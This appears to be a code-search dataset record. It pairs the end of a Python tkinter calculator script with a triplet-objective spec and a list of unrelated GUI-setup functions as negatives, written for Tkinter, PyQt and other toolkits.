command = lambda: add("2") ).pack() # three num3 = tk.Frame( master=calcarea ) num3.grid(row = 3, column = 2) num3b = tk.Button( master = num3, text = "3", width = 5, height = 2, command = lambda: add("3") ).pack() # four num4 = tk.Frame( master=calcarea ) num4.grid(row = 2, column = 0) num4b = tk.Button( master = num4, text = "4", width = 5, height = 2, command = lambda: add("4") ).pack() # five num5 = tk.Frame( master=calcarea ) num5.grid(row = 2, column = 1) num5b = tk.Button( master = num5, text = "5", width = 5, height = 2, command = lambda: add("5") ).pack() # six num6 = tk.Frame( master=calcarea ) num6.grid(row = 2, column = 2) num6b = tk.Button( master = num6, text = "6", width = 5, height = 2, command = lambda: add("6") ).pack() # seven num7 = tk.Frame( master=calcarea ) num7.grid(row = 1, column = 0) num7b = tk.Button( master = num7, text = "7", width = 5, height = 2, command = lambda: add("7") ).pack() # eight num8 = tk.Frame( master=calcarea ) num8.grid(row = 1, column = 1) num8b = tk.Button( master = num8, text = "8", width = 5, height = 2, command = lambda: add("8") ).pack() # nine num9 = tk.Frame( master=calcarea ) num9.grid(row = 1, column = 2) num9b = tk.Button( master = num9, text = "9", width = 5, height = 2, command = lambda: add("9") ).pack() # zero num0 = tk.Frame( master = calcarea ) num0.grid(row = 4, column = 0) num0b = tk.Button( master = num0, text = 0, width = 5, height = 2, command = lambda: add("0") ).pack() # period dot = tk.Frame( master = calcarea ) dot.grid(row = 4, column = 1) dotb = tk.Button( master = dot, text = ".", width = 5, height = 2, command = lambda: add(".") ).pack() # equal sign eq = tk.Frame( master = calcarea ) eq.grid(row = 4, column = 2, columnspan = 2) eqb = tk.Button( master = eq, text = "=", width = 11, height = 2, command = equals ).pack() # plus sign plus = tk.Frame( master = calcarea ) plus.grid(row = 3, column = 4, rowspan = 2) plusb = tk.Button( master = plus, text = "+", width = 5, height = 5, command = lambda: add("+") ).pack() # minus sign minu = tk.Frame( master = calcarea ) minu.grid(row = 3, column = 3) minub = tk.Button( master = minu, text = "-", width = 5, height = 2, command = lambda: add("-") ).pack() # multiplication mult = tk.Frame( master = calcarea ) mult.grid(row = 2, column = 3) multb = tk.Button( master = mult, text = "*", width = 5, height = 2, command = lambda: add("*") ).pack() # division div = tk.Frame( master = calcarea ) div.grid(row = 2, column = 4) divb = tk.Button( master = div, text = "/", width = 5, height = 2, command = lambda: add("/") ).pack() # left parentheses lefp = tk.Frame( master = calcarea ) lefp.grid(row = 1, column = 3) lefpb = tk.Button( master = lefp, text = "(", width = 5, height = 2, command = lambda: add("(") ).pack() # right paraentheses rigp = tk.Frame( master = calcarea ) rigp.grid(row = 1, column = 4) rigpb = tk.Button( master = rigp, text = ")", width = 5, height = 2, command = lambda: add(")") ).pack() # Clear button Clr = tk.Frame( master = calcarea ) Clr.grid(row = 0, column = 3) Clrb = tk.Button( master = Clr, text = "C", width = 5, height = 2, command = clear ).pack() # backspace bck = tk.Frame( master = calcarea ) bck.grid(row = 0, column = 4) bckb = tk.Button( master = bck, text = "\N{RIGHTWARDS BLACK ARROW}", width = 5, height = 2, command = backspace ).pack() # This is what kicks the whole thing off, lets it wait for commands. calc.mainloop()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def prepare_UI(self):", "def create_widgets(self):", "def init_ui(self):\n raise NotImplementedError", "def init_ui(self):\n raise NotImplementedError", "def init_widget(self):", "def mainWidget(self):\n raise RuntimeError('Not implemented')", "def create_widgets( self ):", "def init_UI(self):\n\n self.master.title(\"Search for different companies\")\n self.master.geometry(\"400x400\")\n\n self.label_combobox = Label(self, text=\"Search by\")\n self.label_combobox.pack()\n\n self.combo_searching_options = Combobox(self, state=\"readonly\")\n self.combo_searching_options['values'] = self.combobox_values\n self.combo_searching_options.pack()\n\n self.label_input = Label(self, text=\"Entry the value\")\n self.label_input.pack()\n\n self.user_input = Entry(self, width=40)\n self.user_input.pack()\n\n self.btn_submit = Button(self, text=\"Submit\", command=self.submit)\n self.btn_submit.pack()\n\n self.text_area = scrolledtext.ScrolledText(self)\n self.text_area.pack()\n\n sys.stdout = RedirectOutputText(self.text_area)\n\n self.btn_back = Button(self, text=\"Back\", command=self.go_back)\n self.btn_back.pack()", "def ui(self):\n return ui", "def _init_ui(self):\r\n\t\t\r\n\t\tself.input_frame = Input(self)\r\n\t\tself.input_frame.pack()\r\n\t\t\r\n\t\tbutton_ok = Button(self, text = \"Ping\", command = self._go)\r\n\t\tbutton_ok.pack()\r\n\t\t\r\n\t\tself.result_frame = Result(self)\r\n\t\tself.result_frame.pack()", "def init_ui(self):\n raise NotImplementedError(\"This is an abstract method.\")", "def __init__(self):\r\n super().__init__()\r\n self.init_ui()", "def view(self):", "def _initUI(self) -> None:\n self._createActions()\n self._addActionsToMoveButtons()\n self._createToolBar()\n self._createStatusBar()\n self._createMainContextMenu()", "def getWidget(self):", "def init_ui(self):\n # Create GUI elements, set them in dict structure\n labelwidth = 150\n\n # Add parameter line edit for Factor Tm to Tp\n\n # Add line edit with browsebutton for swan result folder\n self.input_elements['hares folder'] = widgets.ExtendedLineEdit(\n label='HARES uitvoerbestanden folder:',\n labelwidth=labelwidth,\n browsebutton=QtWidgets.QPushButton('...', clicked=self.select_hares_folder)\n )\n\n\n self.setLayout(QtWidgets.QVBoxLayout())\n self.layout().setSpacing(10)\n\n for _, item in self.input_elements.items():\n self.layout().addWidget(item)\n\n line = QtWidgets.QFrame()\n line.setFrameShape(QtWidgets.QFrame.HLine)\n line.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.layout().addWidget(line)\n\n # OK and Cancel buttons\n self.generateButton = QtWidgets.QPushButton('Start lezen uitvoerbestanden')\n self.generateButton.setDefault(True)\n self.generateButton.clicked.connect(self.generate)\n\n self.cancelButton = QtWidgets.QPushButton('Annuleren')\n self.cancelButton.setAutoDefault(False)\n self.cancelButton.clicked.connect(self.cancel)\n\n button_box = QtWidgets.QDialogButtonBox(QtCore.Qt.Horizontal, self)\n button_box.addButton(self.generateButton, QtWidgets.QDialogButtonBox.ActionRole)\n button_box.addButton(self.cancelButton, QtWidgets.QDialogButtonBox.RejectRole)\n button_box.accepted.connect(QtWidgets.QDialog.accept)\n\n self.layout().addWidget(button_box)", "def widgets(self):\r\n self.setWindowTitle(\"PyCrypt\")\r\n self.setMinimumSize(QSize(500, 500))\r\n self.setMaximumSize(QSize(500, 500))\r\n# Adding the sub def for widgets etc\r\n self.add_menus_and_status()\r\n self.add_buttons()", "def init_ui(self):\n self.master.title(\"Backbone\")\n self.master.geometry(\"300x150\")\n\n self.pack(fill=BOTH, expand=1)\n\n self.btn_upload_file = Button(self, text=\"Upload file\", command=self.upload_file)\n self.btn_upload_file.place(x=90, y=10)\n\n self.btn_create_training_file = Button(self, text=\"Create & upload training file\",\n command=self.create_training_file)\n self.btn_create_training_file.place(x=30, y=40)\n\n self.btn_run_algorithm = Button(self, text=\"Run algorithm\", command=self.run_algorithm)\n self.btn_run_algorithm.place(x=80, y=70)\n\n self.btn_view_results = Button(self, text=\"View Results\", command=self.view_results)\n self.btn_view_results.place(x=85, y=100)", "def inicialUI(self):\r\n\r\n self.setGeometry(500, 500, 500, 500)\r\n self.setWindownTitle(\"Pesquisa\")\r\n self.displayWidgets()\r\n\r\n self.show()", "def set_ui(self):\r\n\r\n self.canvas = tk.Canvas(self)\r\n self.canvas.pack()\r\n\r\n self.entry = ttk.Entry(self.canvas, justify=\"center\", font=(\"Calibri\", 12))\r\n\r\n self.grid = Grid(self.canvas)", "def init_ui(self):\n self.parent.title(\"Roku Player Controller\")\n self.style.theme_use(\"default\")", "def show(self):", "def setUp(self):\n self.ui = UI()", "def init_UI(self):\n\n self.master.title(\"Create and upload training file\")\n self.master.geometry('400x400')\n\n self.text_area = scrolledtext.ScrolledText(self)\n self.text_area.pack()\n\n self.user_input = Entry(self, width=10)\n self.user_input.pack()\n\n sys.stdout = RedirectOutputText(self.text_area)\n\n self.create_uncertain_pairs_file()\n\n self.console_label = ConsoleLabel(self.get_uncertain_pairs_file())\n self.current_record_pair = self.console_label.get_uncertain_pair()\n\n self.btn_next = Button(self, text=\"Next\", bg=\"green\", command=self.get_input)\n self.btn_next.pack()\n\n self.back = Button(self, text=\"Back\", command=self.go_back)\n self.back.pack()", "def setup(self):\n self.ui_manager.purge_ui_elements()\n y_slot = self.window.height // 12\n\n ui_input_box = arcade.gui.UIInputBox(\n center_x=self.window.width // 2,\n center_y=y_slot * 7,\n width=250\n )\n ui_input_box.set_style_attrs(\n bg_color=(66, 179, 208),\n bg_color_hover=(112, 212, 238),\n bg_color_focus=(255, 228, 14)\n )\n ui_input_box.text = self.name\n ui_input_box.cursor_index = len(ui_input_box.text)\n self.ui_manager.add_ui_element(ui_input_box)\n\n button = buttons.ExitButton(\n 'Exit',\n center_x=self.window.width // 2,\n center_y=y_slot * 1,\n width=250\n )\n button.set_style_attrs(\n bg_color=(51, 139, 57),\n bg_color_hover=(135, 21, 25),\n bg_color_press=(122, 21, 24),\n )\n self.ui_manager.add_ui_element(button)\n\n button = buttons.AuthorButton(\"Author\",\n center_x=self.window.width // 2,\n center_y=y_slot * 2,\n width=250,\n user=ui_input_box\n )\n button.set_style_attrs(\n bg_color=(51, 139, 57),\n bg_color_hover=(88, 196, 96),\n bg_color_press=(28, 71, 32),\n )\n self.ui_manager.add_ui_element(button)\n\n button = buttons.ResultButton(\"Results\",\n center_x=self.window.width // 2,\n center_y=y_slot * 3,\n width=250,\n user=ui_input_box,\n level = \"level1\"\n )\n button.set_style_attrs(\n bg_color=(51, 139, 57),\n bg_color_hover=(88, 196, 96),\n bg_color_press=(28, 71, 32),\n )\n self.ui_manager.add_ui_element(button)\n\n button = buttons.RulesButton(\"Rules\",\n center_x=self.window.width // 2,\n center_y=y_slot * 4,\n width=250,\n user=ui_input_box\n )\n button.set_style_attrs(\n bg_color=(51, 139, 57),\n bg_color_hover=(88, 196, 96),\n bg_color_press=(28, 71, 32),\n )\n self.ui_manager.add_ui_element(button)\n\n button = buttons.LevelButton(\"Play level 1\",\n center_x=self.window.width // 2,\n center_y=y_slot * 6,\n width=250,\n user=ui_input_box,\n level=\"level1\"\n )\n button.set_style_attrs(\n bg_color=(51, 139, 57),\n bg_color_hover=(88, 196, 96),\n bg_color_press=(28, 71, 32),\n )\n self.ui_manager.add_ui_element(button)\n\n button = buttons.LevelButton(\"Play level 2\",\n center_x=self.window.width // 2,\n center_y=y_slot * 5,\n width=250,\n user=ui_input_box,\n level = \"level2\"\n )\n button.set_style_attrs(\n bg_color=(51, 139, 57),\n bg_color_hover=(88, 196, 96),\n bg_color_press=(28, 71, 32),\n )\n self.ui_manager.add_ui_element(button)", "def make_form(self):", "def initUI(self):\n # Setting the main layout as Vertical.\n self.mainLayout = QHBoxLayout()\n\n # Create title.\n self.title = QLabel(self.__name + \" : \")\n\n # Add description as tooltip.\n self.title.setToolTip(self.__description)\n\n # Add title to main layout.\n self.mainLayout.addWidget(self.title)\n\n # Create ComboBox.\n self.dropDown = QComboBox()\n\n # Add datas to drop down.\n self.dropDown.addItems(self.__datas)\n\n # Set default index to dropdown.\n self.dropDown.setCurrentIndex(self.__currentValue)\n\n # Connect dropdown with update method.\n self.dropDown.currentIndexChanged.connect(self.changeCurrentValue)\n\n # Add ComboBox to main layout.\n self.mainLayout.addWidget(self.dropDown)\n\n # Add the main layout to the window.\n self.setLayout(self.mainLayout)", "def initUI(self):\n\n lbl_names = ['Название проекта', 'Версия', 'Директория', 'Описание', 'Автор', 'Почта', 'Дополнительные зависимости', 'Название ноды']\n param_list = ['motor_driver', '0.0.0', '/home/mitya/catkin_ws/src/', 'The motor_driver package', 'D. Potapov',\n 'potapov627@yandex.ru', 'nav_msgs, geometry_msgs, tf, ', 'motor_driver_node']\n labels = []\n for name in lbl_names:\n labels.append(QLabel(name))\n for i, ph in zip(range(len(labels)), param_list):\n ed_line = QLineEdit()\n if i == 1:\n ed_line.setValidator(QRegExpValidator(QRegExp(\"^([0-9\\.])*[0-9]$\")))\n elif i == 5:\n ed_line.setValidator(QRegExpValidator(QRegExp(\"^([a-z0-9_-]+\\.)*[a-z0-9_-]+@[a-z0-9_-]+(\\.[a-z0-9_-]+)*\\.[a-z]{2,6}$\")))\n ed_line.setPlaceholderText(ph)\n if i != 0:\n ed_line.textEdited.connect(self.change_data)\n else:\n ed_line.textEdited.connect(self.change_pkg_name)\n self.full_ed_lines.append(ed_line)\n grid = QGridLayout()\n grid.setSpacing(5)\n for i in range(1, len(labels) + 1):\n for j in range(0, 2):\n if j == 0:\n grid.addWidget(labels[i - 1], i, j)\n else:\n grid.addWidget(self.full_ed_lines[i - 1], i, j)\n ch_dirButton = QPushButton(self)\n ch_dirButton.setIcon(QIcon('./icons/open_folder.png'))\n ch_dirButton.clicked.connect(self.ch_dirDialog)\n grid.addWidget(ch_dirButton, 3, 3)\n genButton = QPushButton(\"Сгенерировать\")\n genButton.clicked.connect(self.generate)\n grid.addWidget(genButton, len(labels) + 2, 1)\n self.setLayout(grid)\n self.setMinimumSize(700, 400)\n self.show()", "def render(self):", "def init_ui(self):\n # Create GUI elements, set them in dict structure\n labelwidth = 150\n\n # Add parameter line edit for Factor Tm to Tp\n self.input_elements['factor Tm Tp'] = widgets.ParameterInputLine(\n label='Factor Tm naar Tp:',\n labelwidth=labelwidth,\n unitlabel='(NVT: Tp aanwezig)' if 'Tp' in self.hydraulic_loads.columns else '',\n validator=QtGui.QDoubleValidator(0.01, 99.99, 20),\n )\n\n if 'Tp' in self.hydraulic_loads.columns or self.parent_tab.step != 'I1':\n self.input_elements['factor Tm Tp'].set_enabled(False)\n\n # Add line edit with browsebutton for Master template\n self.input_elements['mastertemplate'] = widgets.ExtendedLineEdit(\n label='Master template bestand:',\n labelwidth=labelwidth,\n browsebutton=QtWidgets.QPushButton('...', clicked=self.select_master_template)\n )\n\n # Add line edit with browsebutton for depth file\n self.input_elements['depthfile'] = widgets.ExtendedLineEdit(\n label='Bathymetry bestand:',\n labelwidth=labelwidth,\n browsebutton=QtWidgets.QPushButton('...', clicked=self.select_bathymetry_file)\n )\n\n # Add line edit with browsebutton for swan result folder\n self.input_elements['swanfolder'] = widgets.ExtendedLineEdit(\n label='SWAN uitvoer folder:',\n labelwidth=labelwidth,\n browsebutton=QtWidgets.QPushButton('...', clicked=self.select_swan_folder)\n )\n\n\n self.setLayout(QtWidgets.QVBoxLayout())\n self.layout().setSpacing(10)\n\n for _, item in self.input_elements.items():\n self.layout().addWidget(item)\n\n line = QtWidgets.QFrame()\n line.setFrameShape(QtWidgets.QFrame.HLine)\n line.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.layout().addWidget(line)\n\n # OK and Cancel buttons\n self.generateButton = QtWidgets.QPushButton('Genereer invoer')\n self.generateButton.setDefault(True)\n self.generateButton.clicked.connect(self.generate)\n\n self.cancelButton = QtWidgets.QPushButton('Annuleren')\n self.cancelButton.setAutoDefault(False)\n self.cancelButton.clicked.connect(self.cancel)\n\n button_box = QtWidgets.QDialogButtonBox(QtCore.Qt.Horizontal, self)\n button_box.addButton(self.generateButton, QtWidgets.QDialogButtonBox.ActionRole)\n button_box.addButton(self.cancelButton, QtWidgets.QDialogButtonBox.RejectRole)\n button_box.accepted.connect(QtWidgets.QDialog.accept)\n\n self.layout().addWidget(button_box)", "def main():\r\n return render_template(\"UI.html\")", "def setup_additional_ui(self):\n\n #set title\n self.setWindowTitle(self.title)\n\n #set question\n self.lbl_question.setText(self.question)\n\n #set_remember_choice\n self.set_remember_choice(self.chkbx_remember_choice.isChecked())", "def _setup_ui(self):\n\n self.window = ui.Widget()\n self.window.dimensions = ui.normalize_dimension((\n 0, 0,\n self.normalized_screen_resolution[0],\n self.normalized_screen_resolution[1]\n ))\n self.window.background_color = ImageColor.getcolor('#000000', 'RGB')\n\n interface_frame = ui.Widget(parent=self.window)\n interface_frame.dimensions = ui.normalize_dimension((\n self.preview_renderer.window[2],\n 0,\n self.normalized_screen_resolution[0] - self.preview_renderer.window[2],\n self.normalized_screen_resolution[1]\n ))\n interface_frame.background_color = ImageColor.getcolor('#ffffff', 'RGB')\n\n number = ui.LabelWidget(\"\",\n name=NAME_GET_STARTED,\n parent=interface_frame,\n align=\"center\",\n font_color=(0, 0, 0, 255))\n number.dimensions = (\n 5, 5,\n interface_frame.width - 10,\n interface_frame.height - 10\n )", "def initUI(self):\n\n self.wid = RosGenWidget()\n self.setCentralWidget(self.wid)\n menubar = self.menuBar()\n fileMenu = menubar.addMenu('&Файл')\n editMenu = menubar.addMenu('&Редактирование')\n self.create_menu_par('Менеджер подписчиков и издателей', self.wid.show_manager, fileMenu, 'Ctrl+M')\n self.create_menu_par('Очистить', self.wid.clear_all_lines, editMenu, 'Ctrl+D')\n self.create_menu_par('Загрузить данные из...', self.wid.open_fileDialog, fileMenu, 'Ctrl+F')\n self.create_menu_par('Сохранить как...', self.wid.save_fileDialog, fileMenu, 'Ctrl+S')\n self.create_menu_par('Выход', self.exit_app, fileMenu, 'Esc')\n self.statusbar = self.statusBar()\n self.statusbar.showMessage('Ожидание данных')\n self.wid.msg2Statusbar[str].connect(self.statusbar.showMessage)\n self.setGeometry(600, 200, 700, 400)\n self.setWindowTitle('Генератор шаблонов ROS-приложения')\n self.show()", "def build(self):", "def build(self):", "def build(self):", "def show(self) -> None:", "def setup(self):\n self.ui.setup_window()", "def init_ui(self):\n\n self.master.title(\"Upload file\")\n self.master.geometry(\"300x200\")\n\n self.pack(fill=BOTH, expand=1)\n\n self.btn_select_file = Button(self, text=\"Select file\", command=self.on_open)\n self.btn_select_file.place(x=80, y=50)\n\n self.selected_file_name = Label(self, text=\"<Selected file name>\")\n self.selected_file_name.place(x=60, y=90)\n\n self.btn_upload_file = Button(self, text=\"Upload file\", command=self.upload_file)\n self.btn_upload_file.place(x=80, y=130)\n\n self.btn_back = Button(self, text=\"Back\", command=self.go_back)\n self.btn_back.place(x=10, y=10)", "def _initUI(self):\n\n vlayout = QtWidgets.QVBoxLayout()\n\n # Description\n #----------------------------------------------------------------\n hlayout = QtWidgets.QHBoxLayout()\n\n label = QtWidgets.QLabel()\n label.setText('Locatie:')\n label.setFixedWidth(100)\n hlayout.addWidget(label)\n\n label = QtWidgets.QLabel()\n label.setText(self.name)\n hlayout.addWidget(label)\n hlayout.setSpacing(10)\n\n vlayout.addLayout(hlayout)\n\n # Exportnaam\n #----------------------------------------------------------------\n self.exportname = ParameterInputLine(label='Exportnaam:', labelwidth=100)\n self.exportname.LineEdit.setMinimumWidth(200)\n vlayout.addLayout(self.exportname.layout)\n\n # Exportdatabase\n #----------------------------------------------------------------\n self.exportpath = ExtendedLineEdit(label='SQLite-database:', labelwidth=100, browsebutton=True)\n self.exportpath.BrowseButton.clicked.connect(self._get_path_database)\n vlayout.addLayout(self.exportpath.layout)\n\n # Line\n line = QtWidgets.QFrame()\n line.setFrameShape(QtWidgets.QFrame.HLine)\n line.setFrameShadow(QtWidgets.QFrame.Sunken)\n\n vlayout.addWidget(line)\n\n # Buttons\n #----------------------------------------------------------------\n hbox = QtWidgets.QHBoxLayout()\n hbox.addItem(QtWidgets.QSpacerItem(0, 0, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Maximum))\n # Add ok/close\n self.closebutton = QtWidgets.QPushButton('Sluiten')\n self.closebutton.clicked.connect(self.close)\n hbox.addWidget(self.closebutton)\n # Add ok/close\n self.savebutton = QtWidgets.QPushButton('Opslaan')\n self.savebutton.clicked.connect(self._save)\n hbox.addWidget(self.savebutton)\n\n vlayout.addLayout(hbox)\n\n # Add layout to widget\n self.setLayout(vlayout)", "def _setupUi(self):\n self.setupUi(self)\n self.twTree.setStyleSheet(\"background-color: rgb(200, 200, 200)\")", "def controls_setup(self):\n pass", "def __init__(self, ui: UI):\n super().__init__(ui)", "def create_widget(self):\n pass", "def __init__(self, parent=None):\n super(Representative, self).__init__(parent)\n self.setupUi(self)", "def __setup_ui(self):\n self.pixel_label = QLabel(\"\", self)\n self.pixel_label.setFixedWidth(100)\n self.pixel_coords_label = QLabel(\"\", self)\n self.statusBar().addPermanentWidget(self.pixel_coords_label)\n self.statusBar().addPermanentWidget(self.pixel_label)\n\n self.current_fps_label = QLabel(\"\", self)\n self.statusBar().addPermanentWidget(self.current_fps_label)\n\n self.toolbar = self.addToolBar(\"default\")\n self.toolbar.setMovable(False)\n self.setContextMenuPolicy(Qt.NoContextMenu)\n\n exit_act = QAction(QIcon.fromTheme('exit'), 'Exit', self)\n exit_act.setShortcut('Ctrl+Q')\n exit_act.setStatusTip(\"Exit application\")\n exit_act.triggered.connect(self.app.quit)\n self.toolbar.addAction(exit_act)\n\n preferences_action = QAction(QIcon.fromTheme(\"preferences-desktop\"),\n \"Preferences\", self)\n preferences_action.setStatusTip(\"Open preferences dialog\")\n preferences_action.triggered.connect(self.open_preferences)\n self.toolbar.addAction(preferences_action)\n\n self.device_label = QLabel(\"Device:\")\n self.device_combo = QComboBox(self)\n self.device_combo.setSizeAdjustPolicy(QComboBox.AdjustToContents)\n # self.device_combo.setMinimumWidth(300)\n self.device_combo.activated[str].connect(self.on_device_selected)\n self.toolbar.addWidget(self.device_label)\n self.toolbar.addWidget(self.device_combo)\n\n self.format_label = QLabel(\"Format:\")\n self.format_combo = QComboBox(self)\n self.format_combo.setSizeAdjustPolicy(QComboBox.AdjustToContents)\n self.format_combo.setMinimumWidth(150)\n self.format_combo.activated[str].connect(self.on_format_selected)\n self.toolbar.addWidget(self.format_label)\n self.toolbar.addWidget(self.format_combo)\n\n self.resolution_label = QLabel(\"Resolution:\")\n self.resolution_combo = TcamComboBox(self, \"Select Resolution\")\n self.resolution_combo.setSizeAdjustPolicy(QComboBox.AdjustToContents)\n self.resolution_combo.activated[str].connect(self.on_resolution_selected)\n self.toolbar.addWidget(self.resolution_label)\n self.toolbar.addWidget(self.resolution_combo)\n\n self.fps_label = QLabel(\"FPS:\")\n self.fps_combo = TcamComboBox(self, \"Select FPS:\")\n self.fps_combo.setSizeAdjustPolicy(QComboBox.AdjustToContents)\n self.fps_combo.activated[str].connect(self.on_fps_selected)\n self.toolbar.addWidget(self.fps_label)\n self.toolbar.addWidget(self.fps_combo)\n\n self.save_image = QAction(\"Save Image\", self)\n self.save_image.setIcon(QIcon.fromTheme(\"insert-image\"))\n\n self.save_image.triggered.connect(self.save_image_action)\n self.toolbar.addAction(self.save_image)\n\n self.fit_to_win = QAction(\"Fit To Window\", self)\n self.fit_to_win.setIcon(QIcon.fromTheme(\"zoom-fit-best\"))\n\n self.fit_to_win.triggered.connect(self.fit_to_window)\n self.toolbar.addAction(self.fit_to_win)\n\n self.props_action = QAction(\"\", self)\n self.props_action.setText(\"Properties\")\n self.props_action.setVisible(False)\n self.props_action.triggered.connect(self.toggle_properties_dialog)\n self.toolbar.addAction(self.props_action)\n\n self.recording_action = QAction(\"\", self)\n self.recording_action.setIcon(QIcon.fromTheme(\"media-record\"))\n self.recording_action.setIconText(\"Start recording\")\n self.recording_action.setText(\"Start recording\")\n self.recording_action.triggered.connect(self.start_recording_video)\n self.toolbar.addAction(self.recording_action)\n\n self.set_device_menus_enabled(False)\n\n self.view = None", "def fromControls(self,widget):", "def initializeUI(self):\n self.setStyleSheet(abstyle)\n self.setGeometry(140, 100, 860, 484)\n self.setWindowTitle('Emotions Data View')\n self.setupModelView()", "def create_view(self):\n title_label = Label(self, text='Upload, Preview, Describe and Visualize',\n fg='blue', font=('Arial', 16))\n title_label.pack(fill=BOTH, expand=True)\n select_file_button = Button(self, background='White', text='Select Data File [.csv, .xlsx, .xls, .json, .txt]',\n command=self.start_upload)\n select_file_button.pack(padx=5, pady=10)", "def set_GUI(\r\n self\r\n ):\r\n self.top = tk.Tk()\r\n self.top.title(\"Data Collection Interface\")\r\n \r\n self.get_label(\r\n self.top,\r\n text = \"Folder name\",\r\n width = None, # in characters\r\n height = 1, # in lines\r\n font = None,\r\n stick = tk.W,\r\n row = 0,\r\n column = 0,\r\n return_lbl = False\r\n )\r\n\r\n self.e_path = self.get_entry(\r\n self.top,\r\n default_txt = \"Collected_data\",\r\n enable = True,\r\n width = 30,\r\n row = 0,\r\n column = 1)\r\n\r\n self.get_label(\r\n self.top,\r\n text = \"Number of Images\",\r\n width = None, # in characters\r\n height = 1, # in lines\r\n font = None,\r\n stick = tk.W,\r\n row = 1,\r\n column = 0,\r\n return_lbl = False\r\n )\r\n\r\n self.e_num_images = self.get_entry(\r\n self.top,\r\n default_txt = \"1800\",\r\n enable = True,\r\n width = 30,\r\n row = 1,\r\n column = 1)\r\n\r\n self.get_label(\r\n self.top,\r\n text = \"Total Time\",\r\n width = None, # in characters\r\n height = 1, # in lines\r\n font = None,\r\n stick = tk.W,\r\n row = 2,\r\n column = 0,\r\n return_lbl = False\r\n )\r\n\r\n self.e_tot_time = self.get_entry(\r\n self.top,\r\n default_txt = \"15\",\r\n enable = True,\r\n width = 30,\r\n row = 2,\r\n column = 1)\r\n\r\n self.get_label(\r\n self.top,\r\n text = \"Minutes\",\r\n width = None, # in characters\r\n height = 1, # in lines\r\n font = None,\r\n stick = tk.W,\r\n row = 2,\r\n column = 2,\r\n return_lbl = False\r\n )\r\n\r\n self.get_label(\r\n self.top,\r\n text = \"Time between photos\",\r\n width = None, # in characters\r\n height = 1, # in lines\r\n font = None,\r\n stick = tk.W,\r\n row = 3,\r\n column = 0,\r\n return_lbl = False\r\n )\r\n\r\n self.e_interval = self.get_entry(\r\n self.top,\r\n default_txt = \"0.001\",\r\n enable = False,\r\n width = 30,\r\n row = 3,\r\n column = 1)\r\n\r\n self.get_label(\r\n self.top,\r\n text = \"Seconds\",\r\n width = None, # in characters\r\n height = 1, # in lines\r\n font = None,\r\n stick = tk.W,\r\n row = 3,\r\n column = 2,\r\n return_lbl = False\r\n )\r\n\r\n self.get_label(\r\n self.top,\r\n text = \"Images Per Folder\",\r\n width = None, # in characters\r\n height = 1, # in lines\r\n font = None,\r\n stick = tk.W,\r\n row = 4,\r\n column = 0,\r\n return_lbl = False\r\n )\r\n\r\n self.e_images_per_folder = self.get_entry(\r\n self.top,\r\n default_txt = \"500\",\r\n enable = True,\r\n width = 30,\r\n row = 4,\r\n column = 1)\r\n\r\n self.get_label(\r\n self.top,\r\n text = \"Progress Display Frequency\",\r\n width = None, # in characters\r\n height = 1, # in lines\r\n font = None,\r\n stick = tk.W,\r\n row = 5,\r\n column = 0,\r\n return_lbl = False\r\n )\r\n\r\n self.e_prog_display_freq = self.get_entry(\r\n self.top,\r\n default_txt = \"5\",\r\n enable = True,\r\n width = 30,\r\n row = 5,\r\n column = 1)\r\n\r\n self.get_label(\r\n self.top,\r\n text = \"Preview Display Frequency\",\r\n width = None, # in characters\r\n height = 1, # in lines\r\n font = None,\r\n stick = tk.W,\r\n row = 6,\r\n column = 0,\r\n return_lbl = False\r\n )\r\n\r\n self.e_prew_display_freq = self.get_entry(\r\n self.top,\r\n default_txt = \"10\",\r\n enable = True,\r\n width = 30,\r\n row = 6,\r\n column = 1)\r\n\r\n self.get_label(\r\n self.top,\r\n text = \"\",\r\n width = None, # in characters\r\n height = 2, # in lines\r\n font = None,\r\n stick = tk.W,\r\n row = 7,\r\n column = 2,\r\n return_lbl = False\r\n )\r\n \"\"\"\r\n self.get_label(\r\n self.top,\r\n text = \"\",\r\n width = None, # in characters\r\n height = 2, # in lines\r\n font = None,\r\n stick = tk.W,\r\n row = 8,\r\n column = 2,\r\n return_lbl = False\r\n )\"\"\"\r\n\r\n self.r_radio_button_variable = tk.IntVar(self.top,1)\r\n\r\n self.r_images_time = self.get_radio_button(\r\n self.top,\r\n control_variable =self.r_radio_button_variable ,\r\n returned_value = 1,\r\n text = \"Images + Total time\",\r\n enable = True,\r\n default_state = True,\r\n #width = 30,\r\n row = 9,\r\n column = 0,\r\n align = tk.W,\r\n command = self.block_entry)\r\n\r\n self.r_images_interval = self.get_radio_button(\r\n self.top,\r\n control_variable =self.r_radio_button_variable ,\r\n returned_value = 2,\r\n text = \"Images + Time interval\",\r\n enable = True,\r\n default_state = False,\r\n #width = 30,\r\n row = 10,\r\n column = 0,\r\n align = tk.W,\r\n command = self.block_entry)\r\n\r\n self.r_time_interval = self.get_radio_button(\r\n self.top,\r\n control_variable =self.r_radio_button_variable ,\r\n returned_value = 3,\r\n text = \"Total time + Time interval\",\r\n enable = True,\r\n default_state = False,\r\n #width = 30,\r\n row = 11,\r\n column = 0,\r\n align = tk.W,\r\n command = self.block_entry)\r\n\r\n self.get_label(\r\n self.top,\r\n text = \"\",\r\n width = None, # in characters\r\n height = 2, # in lines\r\n font = None,\r\n stick = tk.W,\r\n row = 12,\r\n column = 0,\r\n return_lbl = False\r\n )\r\n\r\n self.get_label(\r\n self.top,\r\n text = \"\",\r\n width = None, # in characters\r\n height = 1, # in lines\r\n font = None,\r\n stick = tk.W,\r\n row = 14,\r\n column = 0,\r\n return_lbl = False\r\n )\r\n\r\n self.r_quality_variable = tk.StringVar(self.top,\"Low\")\r\n\r\n self.r_HQuality = self.get_radio_button(\r\n self.top,\r\n control_variable =self.r_quality_variable ,\r\n returned_value = \"High\",\r\n text = \"High Quality\",\r\n enable = True,\r\n default_state = False,\r\n #width = 30,\r\n row = 16,\r\n column = 0,\r\n align = tk.W,\r\n command = self.quality_change)\r\n\r\n self.r_LQuality = self.get_radio_button(\r\n self.top,\r\n control_variable =self.r_quality_variable ,\r\n returned_value = \"Low\",\r\n text = \"Low Quality\",\r\n enable = True,\r\n default_state = True,\r\n #width = 30,\r\n row = 15,\r\n column = 0,\r\n align = tk.W,\r\n command = self.quality_change)\r\n\r\n self.r_Day_Night_variable = tk.StringVar(self.top,\"Day\")\r\n\r\n self.r_Day = self.get_radio_button(\r\n self.top,\r\n control_variable =self.r_Day_Night_variable 